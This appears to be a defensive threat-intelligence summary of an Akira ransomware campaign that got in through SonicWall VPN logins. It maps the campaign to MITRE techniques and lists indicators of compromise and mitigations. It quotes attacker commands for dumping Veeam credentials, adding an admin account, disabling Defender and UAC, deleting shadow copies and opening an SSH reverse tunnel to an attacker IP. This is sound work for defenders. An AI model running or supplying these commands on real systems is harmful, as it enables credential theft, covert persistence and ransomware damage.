Threat Research

Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less – Arctic Wolf

Securonix
Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less – Arctic Wolf

Arctic Wolf observed an active campaign beginning July 21, 2025 that abused SonicWall SSL VPN access—often bypassing OTP MFA—to rapidly perform internal scanning, Impacket SMB discovery, extract Veeam credentials, and deploy Akira ransomware within hours. Early indicators included VPN logins from hosting-related ASNs, SMBv2 session requests consistent with Impacket use, and use of tools like rclone and WinRAR for exfiltration. #CVE-2024-40766 #Akira

Keypoints

  • Threat actors gained access via SonicWall SSL VPN logins—often against accounts with OTP MFA enabled—likely leveraging credentials harvested from devices vulnerable to CVE-2024-40766.
  • Post-login activity was fast: internal port scanning, Impacket SMB activity, Active Directory enumeration, and lateral movement (often via RDP) typically began within minutes.
  • Attackers targeted Veeam Backup & Replication to extract VM and backup credentials using sqlcmd and a malicious PowerShell credential-extraction script supporting MSSQL and PostgreSQL.
  • Persistence and C2 involved creating local and domain accounts, installing RMM tools (AnyDesk, RustDesk), SSH reverse tunnels, and Cloudflared tunnels to maintain remote access.
  • Defense evasion included disabling EDR/Windows Defender, deleting shadow copies, disabling UAC via registry changes, and a BYOVD technique using signed consent.exe to load malicious drivers (rwdrv.sys, hlpdrv.sys, hlpdrv/hlpdrv.sys) to tamper kernel ACLs.
  • Data staging and exfiltration used WinRAR, rclone, and FileZilla to transfer archives to VPS infrastructure; ransomware (Akira/locker.exe/w.exe) encrypted systems within hours and deleted shadow copies.
  • Detection and mitigation recommendations: reset SSL VPN and AD credentials for devices that ran vulnerable firmware, monitor for hosting-related ASN logins and Impacket-like SMB session setups, block unnecessary VPN regions/VPS ranges, and enforce execution restrictions and kernel integrity protections.

MITRE Techniques

  • [T1133] External Remote Services – Malicious SonicWall SSL VPN logins provided initial access. Quote: “SSL VPN zone remote user login allowed” and multiple login events originating from hosting-related ASNs.
  • [T1078] Valid Accounts – Threat actors authenticated using valid credentials, including accounts with OTP MFA enabled. Quote: “…otp login” and “User needs one-time password”.
  • [T1046] Network Service Discovery – Internal network scanning with tools such as SoftPerfect Network Scanner and Advanced IP Scanner for port discovery. Quote: “…port scanning, Impacket SMB activity…”
  • [T1135] Network Share Discovery – Share enumeration using SharpShares and other tools to find network shares. Quote: “SharpShares.exe /ldap:all /filter:netlogon,ipc$,print$ /threads:1000 /outfile:C:programdatatb.txt”.
  • [T1087.001/002] Account Discovery – Active Directory and local account enumeration via Get-ADUser/Get-ADComputer, nltest, dsquery. Quote: “Get-ADUser -Filter * -Properties * | Select-Object … > C:ProgramDataAdUsers.txt”.
  • [T1021.001] Remote Desktop Protocol – Use of RDP for lateral movement following credential access. Quote: “RDP was the tool of choice for lateral movement through compromised environments.”
  • [T1021.002] SMB/Windows Admin Shares – Impacket SMBv2 session setup requests used for discovery and lateral movement. Quote: “SMBv2 session setup requests were observed, exhibiting a signature consistent with use of the Python Impacket library.”
  • [T1555] Credentials from Password Stores – Extraction of Veeam credentials from MSSQL/PostgreSQL databases using sqlcmd and a PowerShell credential-extraction script. Quote: “SELECT * FROM [VeeamBackup].[dbo].[Credentials];”
  • [T1136] Create Account – Creation of local and domain accounts like sqlbackup and veean for persistence and blending in. Quote: “net user sqlbackup REDACTED /add” and “net localgroup administrators sqlbackup /add”.
  • [T1112] Modify Registry – Registry modification to disable remote UAC restrictions via LocalAccountTokenFilterPolicy. Quote: “reg add “HKEY_LOCAL_MACHINE…PoliciesSystem” /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f”.
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – Bypassing UAC to obtain elevated privileges for remote accounts. Quote: “Disabled remote UAC restrictions.”
  • [T1562] Impair Defenses – Disabling EDR and Windows Defender settings and deleting Volume Shadow Copies to impede recovery. Quote: “Set-MpPreference -DisableRealtimeMonitoring $true …” and “Get-WmiObject Win32_Shadowcopy | Remove-WmiObject”.
  • [T1204/T1055 implied] User Execution / Process Injection via BYOVD – Bring-your-own-vulnerable-driver technique using consent.exe to load malicious DLLs and drivers to disable security processes. Quote: “consent.exe acts as a launcher… loads a malicious DLL named msimg32.dll or wmsgapi.dll.”
  • [T1102] Web Service – Use of Cloudflared to create tunnels for command and control. Quote: “cloudflared.exe tunnel run –token REDACTED_BASE64_TOKEN”.
  • [T1219] Remote Access Tools – Installation and use of AnyDesk, RustDesk, and other RMM tools for remote control. Quote: “(new-object System.Net.WebClient).DownloadFile(‘hxxp://download[.]anydesk[.]com/AnyDesk.exe’…)”
  • [T1572] Protocol Tunneling – Use of SSH reverse tunnels and Cloudflared for covert access. Quote: “ssh -R 5555 [email protected][.]42” and Cloudflared tunnel usage.
  • [T1560] Archive Collected Data – Use of WinRAR to archive and split files for exfiltration with specific switches to target document/database files. Quote: “winrar.exe a -m0 -v3g -tn365d -n*.txt -n*.pdf …”.
  • [T1041/T1567] Exfiltration over C2 channels – Use of rclone and FileZilla to transfer archives to attacker-controlled VPS infrastructure. Quote: “C:ProgramDatarclonerclone.exe” and “fzsftp.exe” transferring RAR archives over SSH.
  • [T1486] Data Encrypted for Impact – Deployment of Akira ransomware to encrypt files and delete shadow copies. Quote: “akira.exe -n=1 -p=D: … Akira ransomware encrypts files and appends the .akira extension”.

Indicators of Compromise

  • [IPv4 Address] VPN client IPs observed tied to hosting ASNs – 38.114.123[.]167, 107.155.93[.]154 (and many other hosting-related IPs listed such as 45.66.249[.]93, 104.194.11[.]34).
  • [IPv4 Address] Exfiltration / C2 hosts – 162.210.196[.]101 (Leaseweb – C2), 206.168.190[.]143 (1gservers – exfiltration).
  • [Hostname] Threat actor workstation hostnames seen in SMB/Impacket activity – kali, WINUTIL, DESKTOP-A2S6P81 (used during discovery/lateral movement).
  • [File – SHA256/SHA1] Malicious drivers and binaries – 16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0 (SHA256) and 385c235f9f52c68ec4adc7ee07de26b84b108116 (SHA1) associated with BYOVD components like rwdrv.sys / churchill_driver.sys and hlpdrv.sys.
  • [Filenames] Ransomware and loaders observed – akira.exe, locker.exe, w.exe; and tooling paths like C:ProgramDatarclonerclone.exe, C:ProgramDataAnyDesk.exe.

Read more: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint